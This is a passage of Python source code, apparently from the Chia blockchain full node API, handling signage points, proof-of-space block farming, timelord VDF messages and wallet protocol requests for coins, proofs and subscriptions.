sp: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point_by_index(
request.challenge_hash,
request.index_from_challenge,
request.last_rc_infusion,
)
if sp is not None:
assert (
sp.cc_vdf is not None
and sp.cc_proof is not None
and sp.rc_vdf is not None
and sp.rc_proof is not None
)
full_node_response = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
sp.cc_vdf,
sp.cc_proof,
sp.rc_vdf,
sp.rc_proof,
)
return make_msg(ProtocolMessageTypes.respond_signage_point, full_node_response)
else:
self.log.info(f"Don't have signage point {request}")
return None
@peer_required
@api_request
async def respond_signage_point(
self, request: full_node_protocol.RespondSignagePoint, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
# Already have signage point
if self.full_node.full_node_store.have_newer_signage_point(
request.challenge_chain_vdf.challenge,
request.index_from_challenge,
request.reward_chain_vdf.challenge,
):
return None
existing_sp = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_vdf.output.get_hash()
)
if existing_sp is not None and existing_sp.rc_vdf == request.reward_chain_vdf:
return None
peak = self.full_node.blockchain.get_peak()
if peak is not None and peak.height > self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
next_sub_slot_iters = self.full_node.blockchain.get_next_slot_iters(peak.header_hash, True)
sub_slots_for_peak = await self.full_node.blockchain.get_sp_and_ip_sub_slots(peak.header_hash)
assert sub_slots_for_peak is not None
ip_sub_slot: Optional[EndOfSubSlotBundle] = sub_slots_for_peak[1]
else:
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
next_sub_slot_iters = sub_slot_iters
ip_sub_slot = None
added = self.full_node.full_node_store.new_signage_point(
request.index_from_challenge,
self.full_node.blockchain,
self.full_node.blockchain.get_peak(),
next_sub_slot_iters,
SignagePoint(
request.challenge_chain_vdf,
request.challenge_chain_proof,
request.reward_chain_vdf,
request.reward_chain_proof,
),
)
if added:
await self.full_node.signage_point_post_processing(request, peer, ip_sub_slot)
else:
self.log.debug(
f"Signage point {request.index_from_challenge} not added, CC challenge: "
f"{request.challenge_chain_vdf.challenge}, RC challenge: {request.reward_chain_vdf.challenge}"
)
return None
@peer_required
@api_request
async def respond_end_of_sub_slot(
self, request: full_node_protocol.RespondEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
msg, _ = await self.full_node.respond_end_of_sub_slot(request, peer)
return msg
@peer_required
@api_request
async def request_mempool_transactions(
self,
request: full_node_protocol.RequestMempoolTransactions,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
received_filter = PyBIP158(bytearray(request.filter))
items: List[MempoolItem] = await self.full_node.mempool_manager.get_items_not_in_filter(received_filter)
for item in items:
transaction = full_node_protocol.RespondTransaction(item.spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
await peer.send_message(msg)
return None
# FARMER PROTOCOL
@api_request
@peer_required
async def declare_proof_of_space(
self, request: farmer_protocol.DeclareProofOfSpace, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
sp_vdfs: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_sp
)
if sp_vdfs is None:
self.log.warning(f"Received proof of space for an unknown signage point {request.challenge_chain_sp}")
return None
if request.signage_point_index > 0:
assert sp_vdfs.rc_vdf is not None
if sp_vdfs.rc_vdf.output.get_hash() != request.reward_chain_sp:
self.log.debug(
f"Received proof of space for a potentially old signage point {request.challenge_chain_sp}. "
f"Current sp: {sp_vdfs.rc_vdf.output.get_hash()}"
)
return None
if request.signage_point_index == 0:
cc_challenge_hash: bytes32 = request.challenge_chain_sp
else:
assert sp_vdfs.cc_vdf is not None
cc_challenge_hash = sp_vdfs.cc_vdf.challenge
pos_sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = None
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
# Checks that the proof of space is a response to a recent challenge and valid SP
pos_sub_slot = self.full_node.full_node_store.get_sub_slot(cc_challenge_hash)
if pos_sub_slot is None:
self.log.warning(f"Received proof of space for an unknown sub slot: {request}")
return None
total_iters_pos_slot: uint128 = pos_sub_slot[2]
else:
total_iters_pos_slot = uint128(0)
assert cc_challenge_hash == request.challenge_hash
# Now we know that the proof of space has a signage point either:
# 1. In the previous sub-slot of the peak (overflow)
# 2. In the same sub-slot as the peak
# 3. In a future sub-slot that we already know of
# Checks that the proof of space is valid
quality_string: Optional[bytes32] = request.proof_of_space.verify_and_get_quality_string(
self.full_node.constants, cc_challenge_hash, request.challenge_chain_sp
)
assert quality_string is not None and len(quality_string) == 32
# Grab best transactions from Mempool for given tip target
aggregate_signature: G2Element = G2Element()
block_generator: Optional[BlockGenerator] = None
additions: Optional[List[Coin]] = []
removals: Optional[List[Coin]] = []
async with self.full_node._blockchain_lock_high_priority:
peak: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
if peak is not None:
# Finds the last transaction block before this one
curr_l_tb: BlockRecord = peak
while not curr_l_tb.is_transaction_block:
curr_l_tb = self.full_node.blockchain.block_record(curr_l_tb.prev_hash)
try:
mempool_bundle = await self.full_node.mempool_manager.create_bundle_from_mempool(
curr_l_tb.header_hash
)
except Exception as e:
self.log.error(f"Traceback: {traceback.format_exc()}")
self.full_node.log.error(f"Error making spend bundle {e} peak: {peak}")
mempool_bundle = None
if mempool_bundle is not None:
spend_bundle = mempool_bundle[0]
additions = mempool_bundle[1]
removals = mempool_bundle[2]
self.full_node.log.info(f"Add rem: {len(additions)} {len(removals)}")
aggregate_signature = spend_bundle.aggregated_signature
if self.full_node.full_node_store.previous_generator is not None:
self.log.info(
f"Using previous generator for height "
f"{self.full_node.full_node_store.previous_generator}"
)
block_generator = best_solution_generator_from_template(
self.full_node.full_node_store.previous_generator, spend_bundle
)
else:
block_generator = simple_solution_generator(spend_bundle)
def get_plot_sig(to_sign, _) -> G2Element:
if to_sign == request.challenge_chain_sp:
return request.challenge_chain_sp_signature
elif to_sign == request.reward_chain_sp:
return request.reward_chain_sp_signature
return G2Element()
def get_pool_sig(_1, _2) -> Optional[G2Element]:
return request.pool_signature
prev_b: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
# Finds the previous block from the signage point, ensuring that the reward chain VDF is correct
if prev_b is not None:
if request.signage_point_index == 0:
if pos_sub_slot is None:
self.log.warning("Pos sub slot is None")
return None
rc_challenge = pos_sub_slot[0].reward_chain.end_of_slot_vdf.challenge
else:
assert sp_vdfs.rc_vdf is not None
rc_challenge = sp_vdfs.rc_vdf.challenge
# Backtrack through empty sub-slots
for eos, _, _ in reversed(self.full_node.full_node_store.finished_sub_slots):
if eos is not None and eos.reward_chain.get_hash() == rc_challenge:
rc_challenge = eos.reward_chain.end_of_slot_vdf.challenge
found = False
attempts = 0
while prev_b is not None and attempts < 10:
if prev_b.reward_infusion_new_challenge == rc_challenge:
found = True
break
if prev_b.finished_reward_slot_hashes is not None and len(prev_b.finished_reward_slot_hashes) > 0:
if prev_b.finished_reward_slot_hashes[-1] == rc_challenge:
# This block includes a sub-slot which is where our SP vdf starts. Go back one more
# to find the prev block
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
found = True
break
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
attempts += 1
if not found:
self.log.warning("Did not find a previous block with the correct reward chain hash")
return None
try:
finished_sub_slots: Optional[
List[EndOfSubSlotBundle]
] = self.full_node.full_node_store.get_finished_sub_slots(
self.full_node.blockchain, prev_b, cc_challenge_hash
)
if finished_sub_slots is None:
return None
if (
len(finished_sub_slots) > 0
and pos_sub_slot is not None
and finished_sub_slots[-1] != pos_sub_slot[0]
):
self.log.error("Have different sub-slots than is required to farm this block")
return None
except ValueError as e:
self.log.warning(f"Value Error: {e}")
return None
if prev_b is None:
pool_target = PoolTarget(
self.full_node.constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH,
uint32(0),
)
farmer_ph = self.full_node.constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
else:
farmer_ph = request.farmer_puzzle_hash
if request.proof_of_space.pool_contract_puzzle_hash is not None:
pool_target = PoolTarget(request.proof_of_space.pool_contract_puzzle_hash, uint32(0))
else:
assert request.pool_target is not None
pool_target = request.pool_target
if peak is None or peak.height <= self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
difficulty = self.full_node.constants.DIFFICULTY_STARTING
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
else:
difficulty = uint64(peak.weight - self.full_node.blockchain.block_record(peak.prev_hash).weight)
sub_slot_iters = peak.sub_slot_iters
for sub_slot in finished_sub_slots:
if sub_slot.challenge_chain.new_difficulty is not None:
difficulty = sub_slot.challenge_chain.new_difficulty
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
sub_slot_iters = sub_slot.challenge_chain.new_sub_slot_iters
required_iters: uint64 = calculate_iterations_quality(
self.full_node.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
request.proof_of_space.size,
difficulty,
request.challenge_chain_sp,
)
sp_iters: uint64 = calculate_sp_iters(self.full_node.constants, sub_slot_iters, request.signage_point_index)
ip_iters: uint64 = calculate_ip_iters(
self.full_node.constants,
sub_slot_iters,
request.signage_point_index,
required_iters,
)
# The block's timestamp must be greater than the previous transaction block's timestamp
timestamp = uint64(int(time.time()))
curr: Optional[BlockRecord] = prev_b
while curr is not None and not curr.is_transaction_block and curr.height != 0:
curr = self.full_node.blockchain.try_block_record(curr.prev_hash)
if curr is not None:
assert curr.timestamp is not None
if timestamp <= curr.timestamp:
timestamp = uint64(int(curr.timestamp + 1))
self.log.info("Starting to make the unfinished block")
unfinished_block: UnfinishedBlock = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
block_generator,
aggregate_signature,
additions,
removals,
prev_b,
finished_sub_slots,
)
self.log.info("Made the unfinished block")
if prev_b is not None:
height: uint32 = uint32(prev_b.height + 1)
else:
height = uint32(0)
self.full_node.full_node_store.add_candidate_block(quality_string, height, unfinished_block)
foliage_sb_data_hash = unfinished_block.foliage.foliage_block_data.get_hash()
if unfinished_block.is_transaction_block():
foliage_transaction_block_hash = unfinished_block.foliage.foliage_transaction_block_hash
else:
foliage_transaction_block_hash = bytes32([0] * 32)
assert foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
quality_string,
foliage_sb_data_hash,
foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
# Adds backup in case the first one fails
if unfinished_block.is_transaction_block() and unfinished_block.transactions_generator is not None:
unfinished_block_backup = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
None,
G2Element(),
None,
None,
prev_b,
finished_sub_slots,
)
self.full_node.full_node_store.add_candidate_block(
quality_string, height, unfinished_block_backup, backup=True
)
return None
@api_request
@peer_required
async def signed_values(
self, farmer_request: farmer_protocol.SignedValues, peer: ws.WSChiaConnection
) -> Optional[Message]:
candidate_tuple: Optional[Tuple[uint32, UnfinishedBlock]] = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string
)
if candidate_tuple is None:
self.log.warning(f"Quality string {farmer_request.quality_string} not found in database")
return None
height, candidate = candidate_tuple
if not AugSchemeMPL.verify(
candidate.reward_chain_block.proof_of_space.plot_public_key,
candidate.foliage.foliage_block_data.get_hash(),
farmer_request.foliage_block_data_signature,
):
self.log.warning("Signature not valid. There might be a collision in plots. Ignore this during tests.")
return None
fsb2 = dataclasses.replace(
candidate.foliage,
foliage_block_data_signature=farmer_request.foliage_block_data_signature,
)
if candidate.is_transaction_block():
fsb2 = dataclasses.replace(
fsb2, foliage_transaction_block_signature=farmer_request.foliage_transaction_block_signature
)
new_candidate = dataclasses.replace(candidate, foliage=fsb2)
if not self.full_node.has_valid_pool_sig(new_candidate):
self.log.warning("Trying to make a pre-farm block but height is not 0")
return None
# Propagate to ourselves (which validates and does further propagations)
request = full_node_protocol.RespondUnfinishedBlock(new_candidate)
try:
await self.full_node.respond_unfinished_block(request, None, True)
except Exception as e:
# If we have an error with this block, try making an empty block
self.full_node.log.error(f"Error farming block {e} {request}")
candidate_tuple = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string, backup=True
)
if candidate_tuple is not None:
height, unfinished_block = candidate_tuple
self.full_node.full_node_store.add_candidate_block(
farmer_request.quality_string, height, unfinished_block, False
)
# All unfinished blocks that we create will have the foliage transaction block and hash
assert unfinished_block.foliage.foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
farmer_request.quality_string,
unfinished_block.foliage.foliage_block_data.get_hash(),
unfinished_block.foliage.foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
return None
# TIMELORD PROTOCOL
@peer_required
@api_request
async def new_infusion_point_vdf(
self, request: timelord_protocol.NewInfusionPointVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
# Lookup unfinished blocks
async with self.full_node.timelord_lock:
return await self.full_node.new_infusion_point_vdf(request, peer)
@peer_required
@api_request
async def new_signage_point_vdf(
self, request: timelord_protocol.NewSignagePointVDF, peer: ws.WSChiaConnection
) -> None:
if self.full_node.sync_store.get_sync_mode():
return None
full_node_message = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
request.challenge_chain_sp_vdf,
request.challenge_chain_sp_proof,
request.reward_chain_sp_vdf,
request.reward_chain_sp_proof,
)
await self.respond_signage_point(full_node_message, peer)
@peer_required
@api_request
async def new_end_of_sub_slot_vdf(
self, request: timelord_protocol.NewEndOfSubSlotVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_sub_slot(request.end_of_sub_slot_bundle.challenge_chain.get_hash())
is not None
):
return None
# Calls our own internal message to handle the end of sub slot, and potentially broadcasts to other peers.
full_node_message = full_node_protocol.RespondEndOfSubSlot(request.end_of_sub_slot_bundle)
msg, added = await self.full_node.respond_end_of_sub_slot(full_node_message, peer)
if not added:
self.log.error(
f"Was not able to add end of sub-slot: "
f"{request.end_of_sub_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge}. "
f"Re-sending new-peak to timelord"
)
await self.full_node.send_peak_to_timelords(peer=peer)
return None
else:
return msg
@api_request
async def request_block_header(self, request: wallet_protocol.RequestBlockHeader) -> Optional[Message]:
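        """
        Serve a wallet's request for the header block at a given height,
        including the filtered transaction additions and removals; reject the
        request if the height is not in the chain.
        """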
header_hash = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
msg = make_msg(ProtocolMessageTypes.reject_header_request, RejectHeaderRequest(request.height))
return msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
tx_removals, tx_additions, _ = await self.full_node.blockchain.get_tx_removals_and_additions(block)
header_block = get_block_header(block, tx_additions, tx_removals)
msg = make_msg(
ProtocolMessageTypes.respond_block_header,
wallet_protocol.RespondBlockHeader(header_block),
)
return msg
return None
@api_request
async def request_additions(self, request: wallet_protocol.RequestAdditions) -> Optional[Message]:
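        """
        Serve a wallet's request for the coins added in a block. Replies with
        a puzzlehash -> coins map and, when specific puzzle hashes are
        requested, Merkle inclusion/exclusion proofs against the block's
        additions root.
        """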
if request.header_hash is None:
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
else:
header_hash = request.header_hash
if header_hash is None:
raise ValueError(f"Block at height {request.height} not found")
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectAdditionsRequest(request.height, header_hash)
msg = make_msg(ProtocolMessageTypes.reject_additions_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
additions = await self.full_node.coin_store.get_coins_added_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
puzzlehash_coins_map: Dict[bytes32, List[Coin]] = {}
for coin_record in additions:
if coin_record.coin.puzzle_hash in puzzlehash_coins_map:
puzzlehash_coins_map[coin_record.coin.puzzle_hash].append(coin_record.coin)
else:
puzzlehash_coins_map[coin_record.coin.puzzle_hash] = [coin_record.coin]
coins_map: List[Tuple[bytes32, List[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes, Optional[bytes]]] = []
if request.puzzle_hashes is None:
for puzzle_hash, coins in puzzlehash_coins_map.items():
coins_map.append((puzzle_hash, coins))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, None)
else:
# Create addition Merkle set
addition_merkle_set = MerkleSet()
# Addition Merkle set contains puzzlehash and hash of all coins with that puzzlehash
for puzzle, coins in puzzlehash_coins_map.items():
addition_merkle_set.add_already_hashed(puzzle)
addition_merkle_set.add_already_hashed(hash_coin_list(coins))
assert addition_merkle_set.get_root() == block.foliage_transaction_block.additions_root
for puzzle_hash in request.puzzle_hashes:
result, proof = addition_merkle_set.is_included_already_hashed(puzzle_hash)
if puzzle_hash in puzzlehash_coins_map:
coins_map.append((puzzle_hash, puzzlehash_coins_map[puzzle_hash]))
hash_coin_str = hash_coin_list(puzzlehash_coins_map[puzzle_hash])
result_2, proof_2 = addition_merkle_set.is_included_already_hashed(hash_coin_str)
assert result
assert result_2
proofs_map.append((puzzle_hash, proof, proof_2))
else:
coins_map.append((puzzle_hash, []))
assert not result
proofs_map.append((puzzle_hash, proof, None))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_additions, response)
return msg
@api_request
async def request_removals(self, request: wallet_protocol.RequestRemovals) -> Optional[Message]:
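        """
        Serve a wallet's request for the coins removed in a block. Replies
        with the removed coins and, when specific coin names are requested,
        Merkle inclusion/exclusion proofs against the block's removals root.
        """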
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
peak_height = self.full_node.blockchain.get_peak_height()
if (
block is None
or block.is_transaction_block() is False
or block.height != request.height
or (peak_height is not None and block.height > peak_height)
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectRemovalsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_removals_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
all_removals: List[CoinRecord] = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
all_removals_dict: Dict[bytes32, Coin] = {}
for coin_record in all_removals:
all_removals_dict[coin_record.coin.name()] = coin_record.coin
coins_map: List[Tuple[bytes32, Optional[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes]] = []
# If there are no transactions, respond with empty lists
if block.transactions_generator is None:
proofs: Optional[List]
if request.coin_names is None:
proofs = None
else:
proofs = []
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, [], proofs)
elif request.coin_names is None or len(request.coin_names) == 0:
for removed_name, removed_coin in all_removals_dict.items():
coins_map.append((removed_name, removed_coin))
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, None)
else:
assert block.transactions_generator
removal_merkle_set = MerkleSet()
for removed_name, removed_coin in all_removals_dict.items():
removal_merkle_set.add_already_hashed(removed_name)
assert removal_merkle_set.get_root() == block.foliage_transaction_block.removals_root
for coin_name in request.coin_names:
result, proof = removal_merkle_set.is_included_already_hashed(coin_name)
proofs_map.append((coin_name, proof))
if coin_name in all_removals_dict:
removed_coin = all_removals_dict[coin_name]
coins_map.append((coin_name, removed_coin))
assert result
else:
coins_map.append((coin_name, None))
assert not result
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_removals, response)
return msg
@api_request
async def send_transaction(self, request: wallet_protocol.SendTransaction, *, test=False) -> Optional[Message]:
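        """
        Queue the received transaction for mempool processing and poll for up
        to 45 seconds for a status, replying with a TransactionAck (PENDING if
        no status arrived in time).
        """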
spend_name = request.transaction.name()
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(request.transaction, None, spend_name, None, test))
)
# Waits for the transaction to go into the mempool, times out after 45 seconds.
status, error = None, None
sleep_time = 0.01
for i in range(int(45 / sleep_time)):
await asyncio.sleep(sleep_time)
for potential_name, potential_status, potential_error in self.full_node.transaction_responses:
if spend_name == potential_name:
status = potential_status
error = potential_error
break
if status is not None:
break
if status is None:
response = wallet_protocol.TransactionAck(spend_name, uint8(MempoolInclusionStatus.PENDING), None)
else:
error_name = error.name if error is not None else None
if status == MempoolInclusionStatus.SUCCESS:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
else:
                # If it failed or is pending, but it previously succeeded (made it into the mempool), this is idempotence: return SUCCESS
if self.full_node.mempool_manager.get_spendbundle(spend_name) is not None:
response = wallet_protocol.TransactionAck(
spend_name, uint8(MempoolInclusionStatus.SUCCESS.value), None
)
else:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
msg = make_msg(ProtocolMessageTypes.transaction_ack, response)
return msg
@api_request
async def request_puzzle_solution(self, request: wallet_protocol.RequestPuzzleSolution) -> Optional[Message]:
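        """
        Return the puzzle and solution for a coin spent at the given height,
        recovered by running the block's generator; reject if the coin record,
        block, or generator is missing or the lookup fails.
        """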
coin_name = request.coin_name
height = request.height
coin_record = await self.full_node.coin_store.get_coin_record(coin_name)
reject = wallet_protocol.RejectPuzzleSolution(coin_name, height)
reject_msg = make_msg(ProtocolMessageTypes.reject_puzzle_solution, reject)
if coin_record is None or coin_record.spent_block_index != height:
return reject_msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(height)
if header_hash is None:
return reject_msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is None or block.transactions_generator is None:
return reject_msg
block_generator: Optional[BlockGenerator] = await self.full_node.blockchain.get_block_generator(block)
assert block_generator is not None
error, puzzle, solution = get_puzzle_and_solution_for_coin(
block_generator, coin_name, self.full_node.constants.MAX_BLOCK_COST_CLVM
)
if error is not None:
return reject_msg
pz = Program.to(puzzle)
sol = Program.to(solution)
wrapper = PuzzleSolutionResponse(coin_name, height, pz, sol)
response = wallet_protocol.RespondPuzzleSolution(wrapper)
response_msg = make_msg(ProtocolMessageTypes.respond_puzzle_solution, response)
return response_msg
@api_request
async def request_header_blocks(self, request: wallet_protocol.RequestHeaderBlocks) -> Optional[Message]:
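        """
        Return up to 33 consecutive header blocks (start through end height,
        inclusive), each built with its non-coinbase added coins and removal
        names; reject if any requested height is unknown.
        """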
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
return None
header_hashes: List[bytes32] = []
for i in range(request.start_height, request.end_height + 1):
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash is None:
reject = RejectHeaderBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_header_blocks, reject)
return msg
header_hashes.append(header_hash)
blocks: List[FullBlock] = await self.full_node.block_store.get_blocks_by_hash(header_hashes)
header_blocks = []
for block in blocks:
added_coins_records = await self.full_node.coin_store.get_coins_added_at_height(block.height)
removed_coins_records = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
added_coins = [record.coin for record in added_coins_records if not record.coinbase]
removal_names = [record.coin.name() for record in removed_coins_records]
header_block = get_block_header(block, added_coins, removal_names)
header_blocks.append(header_block)
msg = make_msg(
ProtocolMessageTypes.respond_header_blocks,
wallet_protocol.RespondHeaderBlocks(request.start_height, request.end_height, header_blocks),
)
return msg
@api_request
async def respond_compact_proof_of_time(self, request: timelord_protocol.RespondCompactProofOfTime):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_proof_of_time(request)
@execute_task
@peer_required
@api_request
@bytes_required
async def new_compact_vdf(
self, request: full_node_protocol.NewCompactVDF, peer: ws.WSChiaConnection, request_bytes: bytes = b""
):
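        """
        Handle an announcement of a new compact VDF proof. Requests are
        deduplicated by the hash of the raw message and dropped when too many
        are already waiting; processing runs under a semaphore because it can
        be expensive.
        """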
if self.full_node.sync_store.get_sync_mode():
return None
if len(self.full_node.compact_vdf_sem._waiters) > 20:
self.log.debug(f"Ignoring NewCompactVDF: {request}, _waiters")
return
name = std_hash(request_bytes)
if name in self.full_node.compact_vdf_requests:
self.log.debug(f"Ignoring NewCompactVDF: {request}, already requested")
return
self.full_node.compact_vdf_requests.add(name)
        # this semaphore only allows a limited number of tasks to call
        # new_compact_vdf() at a time, since it can be expensive
async with self.full_node.compact_vdf_sem:
try:
await self.full_node.new_compact_vdf(request, peer)
finally:
self.full_node.compact_vdf_requests.remove(name)
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_compact_vdf])
async def request_compact_vdf(self, request: full_node_protocol.RequestCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.request_compact_vdf(request, peer)
@peer_required
@api_request
async def respond_compact_vdf(self, request: full_node_protocol.RespondCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_vdf(request, peer)
@peer_required
@api_request
async def register_interest_in_puzzle_hash(
self, request: wallet_protocol.RegisterForPhUpdates, peer: ws.WSChiaConnection
):
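        """
        Subscribe the peer to updates for the given puzzle hashes (bounded by
        the max_subscribe_items config) and reply with the current coin states
        for those puzzle hashes, including coins discovered via hints.
        """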
if peer.peer_node_id not in self.full_node.peer_puzzle_hash:
self.full_node.peer_puzzle_hash[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
hint_coin_ids = []
# Add peer to the "Subscribed" dictionary
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for puzzle_hash in request.puzzle_hashes:
ph_hint_coins = await self.full_node.hint_store.get_coin_ids(puzzle_hash)
hint_coin_ids.extend(ph_hint_coins)
if puzzle_hash not in self.full_node.ph_subscriptions:
self.full_node.ph_subscriptions[puzzle_hash] = set()
if (
peer.peer_node_id not in self.full_node.ph_subscriptions[puzzle_hash]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.ph_subscriptions[puzzle_hash].add(peer.peer_node_id)
self.full_node.peer_puzzle_hash[peer.peer_node_id].add(puzzle_hash)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
# Send all coins with requested puzzle hash that have been created after the specified height
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_puzzle_hashes(
include_spent_coins=True, puzzle_hashes=request.puzzle_hashes, min_height=request.min_height
)
if len(hint_coin_ids) > 0:
hint_states = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=hint_coin_ids, min_height=request.min_height
)
states.extend(hint_states)
response = wallet_protocol.RespondToPhUpdates(request.puzzle_hashes, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_ph_update, response)
return msg
@peer_required
@api_request
async def register_interest_in_coin(
self, request: wallet_protocol.RegisterForCoinUpdates, peer: ws.WSChiaConnection
):
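        """
        Subscribe the peer to updates for the given coin ids (bounded by the
        max_subscribe_items config) and reply with their current coin states.
        """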
if peer.peer_node_id not in self.full_node.peer_coin_ids:
self.full_node.peer_coin_ids[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for coin_id in request.coin_ids:
if coin_id not in self.full_node.coin_subscriptions:
self.full_node.coin_subscriptions[coin_id] = set()
if (
peer.peer_node_id not in self.full_node.coin_subscriptions[coin_id]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.coin_subscriptions[coin_id].add(peer.peer_node_id)
self.full_node.peer_coin_ids[peer.peer_node_id].add(coin_id)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=request.coin_ids, min_height=request.min_height
)
response = wallet_protocol.RespondToCoinUpdates(request.coin_ids, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_coin_update, response)
return msg
@api_request
async def request_children(self, request: wallet_protocol.RequestChildren) -> Optional[Message]:
coin_records: List[CoinRecord] = await self.full_node.coin_store.get_coin_records_by_parent_ids(
True, [request.coin_name]
)
states = [record.coin_state for record in coin_records]
response = wallet_protocol.RespondChildren(states)
msg = make_msg(ProtocolMessageTypes.respond_children, response)
return msg
@api_request
async def request_ses_hashes(self, request: wallet_protocol.RequestSESInfo):
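        """
        Return the sub-epoch summary reward-chain hashes, and the height
        ranges they cover, for the requested start/end heights.
        """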
ses_height = self.full_node.blockchain.get_ses_heights()
start_height = request.start_height
end_height = request.end_height
ses_hash_heights = []
ses_reward_hashes = []
for idx, ses_start_height in enumerate(ses_height):
if idx == len(ses_height) - 1:
